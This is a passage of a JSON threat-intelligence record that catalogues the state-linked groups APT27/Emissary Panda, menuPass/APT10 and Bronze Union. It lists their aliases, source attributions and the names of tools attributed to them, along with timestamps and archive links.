"Red Phoenix", "Iron Tiger", "Iron Taurus", "Earth Smilodon", "TG-3390", "EMISSARY PANDA", "Group 35", "ZipToken" ], "source_name": "MISPGALAXY:APT27", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ba3fff0c-3ba0-4855-9eeb-1af9ee18136a", "created_at": "2022-10-25T15:50:23.298889Z", "updated_at": "2026-04-10T02:00:05.316886Z", "deleted_at": null, "main_name": "menuPass", "aliases": [ "menuPass", "POTASSIUM", "Stone Panda", "APT10", "Red Apollo", "CVNX", "HOGFISH", "BRONZE RIVERSIDE" ], "source_name": "MITRE:menuPass", "tools": [ "certutil", "FYAnti", "UPPERCUT", "SNUGRIDE", "P8RAT", "RedLeaves", "SodaMaster", "pwdump", "Mimikatz", "PlugX", "PowerSploit", "ChChes", "cmd", "QuasarRAT", "AdFind", "Cobalt Strike", "PoisonIvy", "EvilGrab", "esentutl", "Impacket", "Ecipekac", "PsExec", "HUI Loader" ], "source_id": "MITRE", "reports": null }, { "id": "b399b5f1-42d3-4b53-8c73-d448fce6ab43", "created_at": "2025-08-07T02:03:24.68371Z", "updated_at": "2026-04-10T02:00:03.64323Z", "deleted_at": null, "main_name": "BRONZE UNION", "aliases": [ "APT27 ", "Bowser", "Budworm ", "Circle Typhoon ", "Emissary Panda ", "Group35", "Iron Tiger ", "Linen Typhoon ", "Lucky Mouse ", "TG-3390 ", "Temp.Hippo " ], "source_name": "Secureworks:BRONZE UNION", "tools": [ "AbcShell", "China Chopper", "EAGERBEE", "Gh0st RAT", "OwaAuth", "PhantomNet", "PoisonIvy", "Sysupdate", "Wonknu", "Wrapikatz", "ZxShell", "reGeorg" ], "source_id": "Secureworks", "reports": null }, { "id": "5c13338b-eaed-429a-9437-f5015aa98276", "created_at": "2022-10-25T16:07:23.582715Z", "updated_at": "2026-04-10T02:00:04.675765Z", "deleted_at": null, "main_name": "Emissary Panda", "aliases": [ "APT 27", "ATK 15", "Bronze Union", "Budworm", "Circle Typhoon", "Earth Smilodon", "Emissary Panda", "G0027", "Group 35", "Iron Taurus", "Iron Tiger", "Linen Typhoon", "LuckyMouse", "Operation DRBControl", "Operation Iron Tiger", "Operation PZChao", "Operation SpoiledLegacy", "Operation StealthyTrident", "Red Phoenix", "TEMP.Hippo", "TG-3390", "ZipToken" ], "source_name": "ETDA:Emissary Panda", "tools": [ "ASPXSpy", "ASPXTool", "Agent.dhwf", "AngryRebel", "Antak", "CHINACHOPPER", "China Chopper", "Destroy RAT", "DestroyRAT", "FOCUSFJORD", "Farfli", "Gh0st RAT", "Ghost RAT", "HTTPBrowser", "HTran", "HUC Packet Transmit Tool", "HighShell", "HttpBrowser RAT", "HttpDump", "HyperBro", "HyperSSL", "HyperShell", "Kaba", "Korplug", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "Moudour", "Mydoor", "Nishang", "OwaAuth", "PCRat", "PlugX", "ProcDump", "PsExec", "RedDelta", "SEASHARPEE", "Sensocode", "SinoChopper", "Sogu", "SysUpdate", "TIGERPLUG", "TVT", "Thoper", "Token Control", "TokenControl", "TwoFace", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "Xamtrav", "ZXShell", "gsecdump", "luckyowa" ], "source_id": "ETDA", "reports": null }, { "id": "236429ce-6355-43f6-9b58-e6803a1df3f4", "created_at": "2026-03-16T02:02:50.60344Z", "updated_at": "2026-04-10T02:00:03.641587Z", "deleted_at": null, "main_name": "Bronze Union", "aliases": [ "Circle Typhoon ", "Emissary Panda " ], "source_name": "Secureworks:Bronze Union", "tools": [ "China Chopper", "OwaAuth", "Sysupdate" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775439101, "ts_updated_at": 1775792241, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/291c9f75be5db44e71d84666512d431a4cc5013b.pdf", "text": "https://archive.orkl.eu/291c9f75be5db44e71d84666512d431a4cc5013b.txt", "img": "https://archive.orkl.eu/291c9f75be5db44e71d84666512d431a4cc5013b.jpg" } }